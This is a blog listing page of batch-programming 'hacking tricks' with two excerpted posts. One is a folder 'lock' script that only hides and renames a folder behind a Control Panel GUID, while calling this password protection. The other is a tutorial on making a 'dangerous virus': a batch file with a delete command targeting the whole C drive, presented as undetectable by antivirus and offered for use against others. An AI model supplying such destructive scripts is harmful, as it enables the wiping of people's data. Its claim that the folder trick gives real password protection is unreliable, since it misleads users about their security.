Posts

Showing posts with the label BATCH PROGRAMMING

Password Protect Any Folder Without Any Software

Image
Password Protect Any Folder Without Any Software In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick. How To Lock Folder ?    1. Open Notepad and Copy code given below into it. cls @ECHO OFF title coolhacking-tricks.blogspot.com if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST MyFolder goto MDMyFolder :CONFIRM echo Are you sure to lock this folder? (Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-0800...

Learn To Make Dangerous Virus In A Minute

Image
Learn To Make Dangerous Virus In A Minute. In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk . In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus. What will this virus do ?   You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus . How to Make the virus ?    1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y    2. Save this file as virus.bat (Name can be anything but .bat is must)    3. Now, running this file will delete all the content of C Drive . Warning: Please don't try to run on your own c...